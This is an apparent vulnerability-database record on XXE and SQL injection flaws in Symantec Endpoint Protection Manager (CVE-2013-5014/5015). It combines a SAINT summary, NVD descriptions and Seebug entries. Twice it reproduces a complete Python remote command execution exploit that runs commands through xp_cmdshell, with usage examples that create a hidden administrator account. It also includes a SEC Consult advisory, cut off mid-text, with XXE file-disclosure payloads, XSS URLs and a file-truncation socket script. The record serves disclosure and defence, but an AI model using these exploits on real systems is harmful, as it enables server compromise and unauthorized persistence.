Symantec Endpoint Protection, by Symantec Corporation, is an antivirus and personal firewall product designed to be centrally managed in corporate environments by the Symantec Endpoint Protection Manager (SEPM). The SEPM management console listens on TCP port 9090.
Problem
The management console for Symantec Endpoint Protection Manager is vulnerable to External XML Entity (XXE) injection (CVE-2013-5014) due to improper sanitization of external XML data. This vulnerability could potentially allow unauthorized access to restricted server-side data and console management functionality. Symantec Endpoint Protection Manager's management console is also vulnerable to SQL injection (CVE-2013-5015) due to insufficient sanitization of local queries made against the backend database. The XXE injection vulnerability can be leveraged to exploit the local access SQL injection vulnerability.
Resolution
Apply the updates as described in Symantec Security Advisory SYM14-004.
This exploit was tested against the default Symantec Endpoint Protection Manager installation using embedded database on Windows Server 2003.
Platforms
Windows
{"enchantments": {"score": {"value": 8.8, "vector": "NONE", "modified": "2016-10-03T15:01:53"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-5015", "CVE-2013-5014"]}, {"type": "seebug", "idList": ["SSV:61477", "SSV:85167", "SSV:61449", "SSV:87397"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30465", "SECURITYVULNS:VULN:13676", "SECURITYVULNS:DOC:31375"]}, {"type": "exploitdb", "idList": ["EDB-ID:31853", "EDB-ID:31917"]}, {"type": "zdt", "idList": ["1337DAY-ID-21946", "1337DAY-ID-21940"]}, {"type": "saint", "idList": ["SAINT:45CE4FFC463D53C01F466061A94C2555", "SAINT:01A0A55CF2FF358B33D64AB1C283DE12"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125410", "PACKETSTORM:125366", "PACKETSTORM:129000"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/ANTIVIRUS/SYMANTEC_ENDPOINT_MANAGER_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804513"]}, {"type": "nessus", "idList": ["SYMANTEC_ENDPOINT_PROT_MGR_SYM14-004.NASL"]}], "modified": "2016-10-03T15:01:53"}, "vulnersScore": 8.8}, "reporter": "SAINT Corporation", "id": "SAINT:8A1968C5B206C48FDB6B05B53C345495", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "published": "2014-02-24T00:00:00", "history": [], "bulletinFamily": "exploit", "viewCount": 5, "objectVersion": "1.2", "modified": "2014-02-24T00:00:00", "hash": "7b70f73d133fdee4ef11c520d8e5658b7bff8a90df1b00b3688fe42ea55aafb6", "references": [], "cvelist": ["CVE-2013-5015", "CVE-2013-5014"], "description": "Added: 02/24/2014 \nCVE: [CVE-2013-5014](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5014>) \nBID: [65466](<http://www.securityfocus.com/bid/65466>) \nOSVDB: [103306](<http://www.osvdb.org/103306>) \n\n\n### Background\n\nSymantec Endpoint Protection, by Symantec Corporation, is an antivirus and personal firewall product designed to be centrally managed in corporate environments by the Symantec Endpoint Protection Manager (SEPM). The SEPM management console listens on TCP port 9090. \n\n### Problem\n\nThe management console for Symantec Endpoint Protection Manager is vulnerable to External XML Entity (XXE) injection (CVE-2013-5014) due to improper sanitization of external XML data. This vulnerability could potentially allow unauthorized access to restricted server-side data and console management functionality. Symantec Endpoint Protection Manager's management console is also vulnerable to SQL injection (CVE-2013-5015) due to insufficient sanitization of local queries made against the backend database. The XXE injection vulnerability can be leveraged to exploit the local access SQL injection vulnerability. \n\n### Resolution\n\nApply the updates as described in Symantec Security Advisory [SYM14-004](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00>). \n\n### References\n\n<http://www.zdnet.com/attackers-scanning-for-symantec-endpoint-protection-manager-flaw-7000026418/> \n<http://secunia.com/advisories/cve_reference/CVE-2013-5014/> \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5015> \n<http://secunia.com/advisories/cve_reference/CVE-2013-5015/> \n<http://osvdb.org/show/osvdb/103306> \n\n\n### Limitations\n\nThis exploit was tested against the default Symantec Endpoint Protection Manager installation using embedded database on Windows Server 2003. \n\n### Platforms\n\nWindows \n \n\n", "type": "saint", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/symantec_epm_xxe_sql_inj", "lastseen": "2016-10-03T15:01:53", "edition": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "943f83493904221e2ca7e74bbccb4621", "key": "cvelist"}, {"hash": "2c14bc201ff403deced3aba2df959f24", "key": "cvss"}, {"hash": "1a491ff262aecd9f5005139e7d2370cb", "key": "description"}, {"hash": "8a1968c5b206c48fdb6b05b53c345495", "key": "href"}, {"hash": "7298cf04f61bd8454400f26fa60b05ca", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "7298cf04f61bd8454400f26fa60b05ca", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "2ca24bb08ce3215d7532ebb1a2a0c706", "key": "title"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "title": "Symantec Endpoint Protection Manager XXE and SQL Injection Vulnerabilities"}
{"cve": [{"lastseen": "2019-05-29T18:13:05", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in the management console in Symantec Endpoint Protection Manager (SEPM) 11.0 before 11.0.7405.1424 and 12.1 before 12.1.4023.4080, and Symantec Protection Center Small Business Edition 12.x before 12.1.4023.4080, allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors.", "modified": "2015-07-30T14:50:00", "id": "CVE-2013-5015", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5015", "published": "2014-02-14T13:10:00", "title": "CVE-2013-5015", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:13:05", "bulletinFamily": "NVD", "description": "The management console in Symantec Endpoint Protection Manager (SEPM) 11.0 before 11.0.7405.1424 and 12.1 before 12.1.4023.4080, and Symantec Protection Center Small Business Edition 12.x before 12.1.4023.4080, allows remote attackers to read arbitrary files via XML data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.", "modified": "2014-03-26T04:51:00", "id": "CVE-2013-5014", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5014", "published": "2014-02-14T13:10:00", "title": "CVE-2013-5014", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T17:36:11", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 65467\r\nCVE(CAN) ID: CVE-2013-5015\r\n\r\nSymantec Endpoint Protection (SEP)\u662f\u53cd\u75c5\u6bd2\u548c\u9632\u706b\u5899\u4ea7\u54c1\u3002\r\n\r\nSymantec Endpoint Protection Manager 11.0\u3001Symantec Endpoint Protection Center Small Business Edition 12.0\u3001Symantec Endpoint Protection Manager 12.1\u7248\u672c\u6ca1\u6709\u6709\u6548\u8fc7\u6ee4\u6570\u636e\u5e93\u7684\u672c\u5730\u8bf7\u6c42\uff0c\u6076\u610f\u672c\u5730\u7528\u6237\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u6ce8\u5165\u4efb\u610fSQL\u6570\u636e\u5e93\u67e5\u8be2\u3002\r\n0\r\nSymantec Web Gateway < 5.2\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nSymantec\r\n--------\r\nSymantec\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08SYM14-004\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nSYM14-004\uff1aSecurity Advisories Relating to Symantec Products - Symantec Endpoint Protection Manager Vulnerabilities\r\n\u94fe\u63a5\uff1ahttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=secu", "modified": "2014-02-19T00:00:00", "published": "2014-02-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61477", "id": "SSV:61477", "type": "seebug", "title": "Symantec Endpoint Protection Manager\u672c\u5730SQL\u6ce8\u5165\u6f0f\u6d1e(CVE-2013-5015)", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T17:35:33", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 65466\r\nCVE(CAN) ID: CVE-2013-5014\r\n\r\nSymantec Endpoint Protection (SEP)\u662f\u7531Symantec Corporation\u5f00\u53d1\u7684\u65b0\u4e00\u4ee3\u53cd\u75c5\u6bd2\u548c\u9632\u706b\u5899\u4ea7\u54c1\u3002\r\n\r\nSymantec Endpoint Protection Manager 11.0\u3001Symantec Endpoint Protection Center Small Business Edition 12.0\u3001Symantec Endpoint Protection Manager 12.1\u7248\u672c\u6ca1\u6709\u6b63\u786e\u5904\u7406\u901a\u8fc7TCP\u7aef\u53e39090\uff08HTTP\uff09\u53ca\u7aef\u53e38443\uff08HTTPS\uff09\u53d1\u9001\u5230\u7ba1\u7406\u63a7\u5236\u53f0\u7684\u5916\u90e8XML\u6570\u636e\uff0c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u8fd9\u53ef\u4f7f\u6076\u610f\u7528\u6237\u5728\u672a\u6388\u6743\u60c5\u51b5\u4e0b\u8bbf\u95ee\u654f\u611f\u7684\u670d\u52a1\u5668\u6587\u4ef6\u53ca\u529f\u80fd\u3002\r\n0\r\nSymantec Endpoint Protection 12.1\r\nSymantec Endpoint Protection 12.0\r\nSymantec Endpoint Protection 11.0\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nSymantec\r\n--------\r\nSymantec\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08SYM14-004\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nSYM14-004\uff1aSecurity Advisories Relating to Symantec Products - Symantec Endpoint Protection Manager Vulnerabilities\r\n\u94fe\u63a5\uff1ahttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00", "modified": "2014-02-14T00:00:00", "published": "2014-02-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61449", "id": "SSV:61449", "type": "seebug", "title": "Symantec Endpoint Protection Manager XML\u5916\u90e8\u5b9e\u4f53\u6ce8\u5165\u6f0f\u6d1e", "sourceData": "\n import argparse\r\nimport httplib\r\n \r\n"""\r\nExploit Title: Symantec Endpoint Protection Manager Remote Command Execution\r\nExploit Author: Chris Graham @cgrahamseven\r\nCVE: CVE-2013-5014, CVE-2013-5015\r\nDate: February 22, 2014\r\nVendor Homepage: http://www.symantec.com/endpoint-protection\r\nVersion: 11.0, 12.0, 12.1\r\nTested On: Windows Server 2003, default SEPM install using embedded database\r\nReferences: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00\r\nDetails:\r\n \r\nFirst off, this was a fantastic discovery by Stefan Viehbock. The abuse of the XXE \r\ninjection to force SEPM to exploit itself through a separate SQL injection flaw was \r\nparticularly amusing. I suspect the majority of SEPM users will have it configured\r\nwith the default embedded database, thereby making this a pretty reliable exploit.\r\n \r\nSo basically what you are looking for with the XXE injection is a vulnerability \r\nthat can be triggered in the ConsoleServlet. When a multipart http request is sent, \r\nthe servlet will use a custom MultipartParser class to handle the individual \r\nmultipart bodies. When a body is encountered that uses a Content-Type of text/xml, \r\nthe Java DocumentBuilder class is used to parse the xml. Since Symantec did not \r\ndisallow declared DTD processing, it is vulnerable to the XXE injection. This \r\nappears to be a blind XXE, so a better use of the vulnerability is use it for SSRF.\r\nThat leads us to the SQL injection flaw.\r\n \r\nSymantec has an http request handler called ConfigServerHandler that is programmatically \r\nrestricted to only handle requests that come from localhost. I guess when they wrote this \r\nthey just assumed that there was never going to be a way to send untrusted input to it \r\nsince it was always going to be controlled by them. I base this guess on the fact that \r\nthere is absolutely no attempt made to validate what input comes in to the \r\nupdateReportingVersion function which shoves it directly into a SQL query unfiltered. In \r\norder to trigger the SQL injection you just need to send the SQL injection string in the \r\n"Parameter" url param with the "action" param set to test_av. On a default install of SEPM, \r\nit uses a SQL Anywhere embedded database. Much like MSSQL, SQL Anywhere has an xp_cmdshell \r\nstored procedure to run local OS commands. Using this stored procedure, you can compromise \r\nthe server that is running SEPM. \r\n \r\nExample Usage: \r\npython sepm_xxe_exploit.py -t 192.168.1.100 -c "net user myadmin p@ss!23 /add"\r\npython sepm_xxe_exploit.py -t 192.168.1.100 -c "net localgroup Administrators myadmin /add"\r\n"""\r\n \r\nmultipart_body = \\\r\n"------=_Part_156_33010715.1234\\r\\n" + \\\r\n"Content-Type: text/xml\\r\\n" + \\\r\n"Content-Disposition: form-data; name=\\"Content\\"\\r\\n\\r\\n" + \\\r\n"<?xml version=\\"1.0\\" encoding=\\"UTF-8\\"?>\\r\\n" + \\\r\n"<!DOCTYPE sepm [<!ENTITY payload SYSTEM " + \\\r\n"\\"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av" + \\\r\n"&SequenceNum=140320121&Parameter=a'; call xp_cmdshell('%s');--\\" >]>\\r\\n" + \\\r\n"<request>\\r\\n" + \\\r\n"<xxe>&payload;</xxe>\\r\\n" + \\\r\n"</request>\\r\\n" + \\\r\n"------=_Part_156_33010715.1234--\\r\\n"\r\nheaders = {'Content-Type':"multipart/form-data; boundary=\\"----=_Part_156_33010715.1234\\""}\r\n \r\ncmdline_parser = argparse.ArgumentParser(description='Symantec Endpoint Protection Manager' + \\\r\n' Remote Command Execution')\r\ncmdline_parser.add_argument('-t', dest='ip', help='Target IP', required=True)\r\ncmdline_parser.add_argument('-p', dest='port', help='Target Port', default=9090, \\\r\ntype=int, required=False)\r\ncmdline_parser.add_argument('-ssl', dest='ssl', help='Uses SSL (set to 1 for true)', \\\r\ndefault=0, type=int, required=False)\r\ncmdline_parser.add_argument('-c', dest='cmd', help='Windows cmd to run (must be in quotes ie "net user")', \\\r\nrequired=True)\r\nargs = cmdline_parser.parse_args()\r\n \r\nif args.ssl == 1:\r\n conn = httplib.HTTPSConnection(args.ip, args.port)\r\nelse:\r\n conn = httplib.HTTPConnection(args.ip, args.port)\r\nmultipart_body = multipart_body % (args.cmd)\r\nprint "\\n[*]Attempting to exploit XXE and run local windows command: " + args.cmd\r\nconn.request("POST", "/servlet/ConsoleServlet?ActionType=ConsoleLog", multipart_body, headers)\r\nres = conn.getresponse()\r\nif res.status != 200:\r\n print "[-]Exploit unsuccessful! Server returned:\\n" + res.read()\r\nelse:\r\n print "[+]Exploit successfully sent!"\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61449", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T16:12:23", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-85167", "id": "SSV:85167", "title": "Symantec Endpoint Protection Manager - Remote Command Execution Exploit", "type": "seebug", "sourceData": "\n import argparse\r\nimport httplib\r\n\r\n"""\r\nExploit Title: Symantec Endpoint Protection Manager Remote Command Execution\r\nExploit Author: Chris Graham @cgrahamseven\r\nCVE: CVE-2013-5014, CVE-2013-5015\r\nDate: February 22, 2014\r\nVendor Homepage: http://www.symantec.com/endpoint-protection\r\nVersion: 11.0, 12.0, 12.1\r\nTested On: Windows Server 2003, default SEPM install using embedded database\r\nReferences: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00\r\nDetails:\r\n\r\nFirst off, this was a fantastic discovery by Stefan Viehbock. The abuse of the XXE \r\ninjection to force SEPM to exploit itself through a separate SQL injection flaw was \r\nparticularly amusing. I suspect the majority of SEPM users will have it configured\r\nwith the default embedded database, thereby making this a pretty reliable exploit.\r\n\r\nSo basically what you are looking for with the XXE injection is a vulnerability \r\nthat can be triggered in the ConsoleServlet. When a multipart http request is sent, \r\nthe servlet will use a custom MultipartParser class to handle the individual \r\nmultipart bodies. When a body is encountered that uses a Content-Type of text/xml, \r\nthe Java DocumentBuilder class is used to parse the xml. Since Symantec did not \r\ndisallow declared DTD processing, it is vulnerable to the XXE injection. This \r\nappears to be a blind XXE, so a better use of the vulnerability is use it for SSRF.\r\nThat leads us to the SQL injection flaw.\r\n\r\nSymantec has an http request handler called ConfigServerHandler that is programmatically \r\nrestricted to only handle requests that come from localhost. I guess when they wrote this \r\nthey just assumed that there was never going to be a way to send untrusted input to it \r\nsince it was always going to be controlled by them. I base this guess on the fact that \r\nthere is absolutely no attempt made to validate what input comes in to the \r\nupdateReportingVersion function which shoves it directly into a SQL query unfiltered. In \r\norder to trigger the SQL injection you just need to send the SQL injection string in the \r\n"Parameter" url param with the "action" param set to test_av. On a default install of SEPM, \r\nit uses a SQL Anywhere embedded database. Much like MSSQL, SQL Anywhere has an xp_cmdshell \r\nstored procedure to run local OS commands. Using this stored procedure, you can compromise \r\nthe server that is running SEPM. \r\n\r\nExample Usage: \r\npython sepm_xxe_exploit.py -t 192.168.1.100 -c "net user myadmin p@ss!23 /add"\r\npython sepm_xxe_exploit.py -t 192.168.1.100 -c "net localgroup Administrators myadmin /add"\r\n"""\r\n\r\nmultipart_body = \\\r\n"------=_Part_156_33010715.1234\\r\\n" + \\\r\n"Content-Type: text/xml\\r\\n" + \\\r\n"Content-Disposition: form-data; name=\\"Content\\"\\r\\n\\r\\n" + \\\r\n"<?xml version=\\"1.0\\" encoding=\\"UTF-8\\"?>\\r\\n" + \\\r\n"<!DOCTYPE sepm [<!ENTITY payload SYSTEM " + \\\r\n"\\"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av" + \\\r\n"&SequenceNum=140320121&Parameter=a'; call xp_cmdshell('%s');--\\" >]>\\r\\n" + \\\r\n"<request>\\r\\n" + \\\r\n"<xxe>&payload;</xxe>\\r\\n" + \\\r\n"</request>\\r\\n" + \\\r\n"------=_Part_156_33010715.1234--\\r\\n"\r\nheaders = {'Content-Type':"multipart/form-data; boundary=\\"----=_Part_156_33010715.1234\\""}\r\n\r\ncmdline_parser = argparse.ArgumentParser(description='Symantec Endpoint Protection Manager' + \\\r\n' Remote Command Execution')\r\ncmdline_parser.add_argument('-t', dest='ip', help='Target IP', required=True)\r\ncmdline_parser.add_argument('-p', dest='port', help='Target Port', default=9090, \\\r\ntype=int, required=False)\r\ncmdline_parser.add_argument('-ssl', dest='ssl', help='Uses SSL (set to 1 for true)', \\\r\ndefault=0, type=int, required=False)\r\ncmdline_parser.add_argument('-c', dest='cmd', help='Windows cmd to run (must be in quotes ie "net user")', \\\r\nrequired=True)\r\nargs = cmdline_parser.parse_args()\r\n\r\nif args.ssl == 1:\r\n conn = httplib.HTTPSConnection(args.ip, args.port)\r\nelse:\r\n conn = httplib.HTTPConnection(args.ip, args.port)\r\nmultipart_body = multipart_body % (args.cmd)\r\nprint "\\n[*]Attempting to exploit XXE and run local windows command: " + args.cmd\r\nconn.request("POST", "/servlet/ConsoleServlet?ActionType=ConsoleLog", multipart_body, headers)\r\nres = conn.getresponse()\r\nif res.status != 200:\r\n print "[-]Exploit unsuccessful! Server returned:\\n" + res.read()\r\nelse:\r\n print "[+]Exploit successfully sent!"\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-85167"}, {"lastseen": "2017-11-19T13:10:11", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-11-13T00:00:00", "published": "2014-11-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87397", "id": "SSV:87397", "type": "seebug", "title": "Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities", "sourceData": "\n SEC Consult Vulnerability Lab Security Advisory < 20141106-0 >\r\n=======================================================================\r\n title: XXE & XSS & Arbitrary File Write vulnerabilities\r\n product: Symantec Endpoint Protection\r\n vulnerable version: 12.1.4023.4080\r\n fixed version: 12.1.5 (RU 5)\r\n impact: Critical\r\n CVE number: CVE-2014-3437, CVE-2014-3438, CVE-2014-3439\r\n homepage: http://www.symantec.com\r\n found: 2014-07-01\r\n by: Stefan Viehb\u00f6ck\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n=======================================================================\r\n \r\n \r\nVendor description:\r\n-------------------\r\n"Symantec Endpoint Protection is a client-server solution that protects\r\nlaptops, desktops, Windows and Mac computers, and servers in your network\r\nagainst malware. Symantec Endpoint Protection combines virus protection with\r\nadvanced threat protection to proactively secure your computers against known\r\nand unknown threats.\r\nSymantec Endpoint Protection protects against malware such as viruses, worms,\r\nTrojan horses, spyware, and adware. It provides protection against even the\r\nmost sophisticated attacks that evade traditional security measures, such as\r\nrootkits, zero-day attacks, and spyware that mutates. Providing low maintenance\r\nand high power, Symantec Endpoint Protection communicates over your network to\r\nautomatically safeguard for both physical systems and virtual systems against\r\nattacks."\r\n \r\nSource:\r\nhttps://www.symantec.com/endpoint-protection\r\nhttps://www.symantec.com/business/support/index?page=content&id=DOC6153\r\n \r\n \r\nBusiness recommendation:\r\n------------------------\r\nAttackers are able to perform denial-of-service attacks against the Endpoint\r\nProtection Manager which directly impacts the effectiveness of the client-side\r\nendpoint protection. Furthermore, session identifiers of users can be stolen\r\nto impersonate them and gain unauthorized access to the server.\r\n \r\nAll of these attacks can have a severe impact on the security infrastructure.\r\nAn update to the latest version (12.1.5 RU 5) is highly recommended.\r\n \r\n \r\n \r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) XML External Entity Injection (XXE) [CVE-2014-3437]\r\nMultiple XXE vulnerabilities were found in the Endpoint Protection Manager\r\napplication. An attacker needs to perform MitM attacks to impersonate\r\nsecurityresponse.symantec.com (eg. via DNS poisoning/spoofing/hijacking,\r\nARP spoofing, QUANTUM-style attacks, ...) to inject malicious XML code.\r\nThese vulnerabilities can be used to execute server side request\r\nforgery (SSRF) attacks used for portscanning/fingerprinting, denial of service,\r\nfile disclosure as well as attacks against functionality that is only\r\nexposed internally (see CVE-2013-5015 and issue #3).\r\n \r\nNote:\r\nThe exploitation scenario proves that the previous command execution via\r\nSQL injection was exploitable for an external attacker with the ability to\r\nmanipulate internet traffic _without any prior knowledge_ of the target system.\r\n \r\n \r\n2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438]\r\nEndpoint Protection Manager suffers from a reflected cross-site scripting\r\nvulnerability, which allows an attacker to steal other users' sessions, to\r\nimpersonate other users and to gain unauthorized access to the admin interface.\r\n \r\n \r\n3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439]\r\nArbitrary files can be written or overwritten by an unauthenticated attacker.\r\nThe target file is truncated in the process which results in Denial of Service.\r\nHowever it might be possible to write files with arbitrary content nonetheless.\r\n \r\n \r\n \r\nProof of concept:\r\n-----------------\r\n1) XML External Entity Injection (XXE) [CVE-2014-3437]\r\nThe Symantec Protection Center component downloads XML files from\r\nhttp://securityresponse.symantec.com for information purposes.\r\nBy impersonating securityresponse.symantec.com (eg. via DNS\r\npoisoning/spoofing/hijacking, ARP spoofing, QUANTUM-style attacks, ...) an\r\nattacker can inject malicious XML code into the file contents and thus exploit\r\nXXE vulnerabilities.\r\n \r\nFor example by offering the following XML code at the URL\r\nhttp://securityresponse.symantec.com/avcenter/deepsightkiosk/9.xml\r\narbitrary files can be disclosed via the Symantec Protection Center login\r\npage at https://<HOST>:8443/portal/Login.jsp\r\n \r\n===============================================================================\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n \r\n<!DOCTYPE a [<!ENTITY e SYSTEM 'file:///c:/windows/win.ini'> ]>\r\n \r\n<data>\r\n <regular>\r\n <text>&e;</text>\r\n </regular>\r\n <outbreak></outbreak>\r\n <threatcon>1</threatcon>\r\n</data>\r\n===============================================================================\r\n \r\n \r\nServer Side Request Forgery (SSRF) can be exploited like in the following\r\nexample that sets the application log level to "log all messages" eg. via\r\nhttp://securityresponse.symantec.com/avcenter/deepsightkiosk/10.xml\r\n \r\n===============================================================================\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n \r\n<!DOCTYPE a [<!ENTITY e SYSTEM\r\n'http://localhost:9090/servlet/ConsoleServlet?ActionType=ConfigServer&logLevel=ALL'> ]>\r\n<foo>&e;</foo>\r\n===============================================================================\r\n \r\nFurthermore some files can be exfiltrated to remote servers via the\r\ntechniques described in:\r\nhttps://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf\r\nhttp://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf\r\n \r\n \r\n2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438]\r\nAt least the following URLs are vulnerable to XSS:\r\nhttps://<HOST>:8443/console/Highlander_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>\r\nhttps://<HOST>:8443/portal/Loading.jsp?uri=Ij48c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0Pj9BQUFBPUJCQkIiPjxzY3JpcHQ%2bYWxlcnQoJ3hzcycpPC9zY3JpcHQ%2b\r\n \r\n \r\n3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439]\r\nA flaw in ConsoleServlet allows an attacker to specify the application server\r\nthread name via the ActionType parameter. As the thread name is used in\r\nthe pattern that is passed to the java.util.logging.FileHandler constructor\r\nby the logging component (ServerLogger) an attacker can define the log file\r\npath. By causing an exception in the thread, the log file is written to\r\ndisk.\r\nThe following code snippet causes an exception by terminating the TCP\r\nconnection before the server has finished writing the response to the socket.\r\n \r\nActionType=/../../../../../../../../../../WINDOWS/win.ini%00 causes the win.ini\r\nfile to be truncated.\r\n \r\n===============================================================================\r\nimport socket\r\nimport struct\r\n \r\nHOST = '<HOST>'\r\nPORT = 9090\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((HOST, PORT))\r\nl_onoff = 1\r\nl_linger = 0\r\ns.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,struct.pack('ii', l_onoff, l_linger))\r\n \r\nmsg = '''GET\r\n/servlet/ConsoleServlet?ActionType=/../../../../../../../../../../WINDOWS/win.ini%00\r\nHTTP/1.1\r\nHost: SYMEPP\r\nEvilContent: <?php evilcode(); ?>\r\n \r\n'''\r\n \r\ns.sendall(msg)\r\ns.shutdown(socket.SHUT_RD)\r\n===============================================================================\r\n \r\n \r\nActionType=/../../Inetpub/Reporting/evil.php%00 causes the (empty) file\r\nevil.php to be written into the Apache webroot.\r\n \r\nActionType=/../../Inetpub/Reporting/evil.php causes the file\r\nevil-0.log to be written into the Apache webroot.\r\n \r\nIf the application log level has been set to "DEBUG" (which can be achieved\r\nvia XXE, see issue #1) the file content includes all headers passed in the\r\nHTTP request (including the EvilContent header in the example above). However\r\nthe file will not be processed by PHP because of the .log extension. Due to\r\nthe complex nature of the Windows filesystem addressing modes (legacy/DOS,\r\nADS, etc.) it is entirely possible that this limitation can be bypassed.\r\n \r\n \r\n \r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe vulnerabilities have been verified to exist in Symantec Endpoint Protection\r\nversion 12.1.4023.4080, which was the most recent version at the time of discovery.\r\n \r\n \r\nVendor contact timeline:\r\n------------------------\r\n2014-07-11: Initial contact to secure@symantec.com\r\n2014-07-29: Ask for status at secure@symantec.com\r\n2014-08-01: Conference call about status, extended grace period to 2014-10-31\r\nSeptember/October: Several discussions / rechecks of the vulnerabilities\r\n2014-11-06: Coordinated release of the advisory\r\n \r\n \r\nSolution:\r\n---------\r\n \r\n1) XML External Entity Injection (XXE) [CVE-2014-3437]\r\n \r\nUpdate to version 12.1.5 RU 5\r\n \r\n2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438]\r\n \r\nUpdate to version 12.1.5 RU 5\r\n \r\n3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439]\r\n \r\nThe update to version 12.1.5 RU 5 only partially mitigates the vulnerability.\r\nPath Traversal is no longer possible, which reduces the severity to\r\nlow/medium. The vendor claims that it will be entirely solved in the next\r\nversion (12.1.5 RU6).\r\n \r\n \r\nFor further information see the security advisory of the vendor:\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141105_00\r\n \r\n \r\nWorkaround:\r\n-----------\r\nSee Symantec security advisory for further mitigations.\r\n \r\n \r\nAdvisory URL:\r\n--------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n \r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Vulnerability Lab\r\n 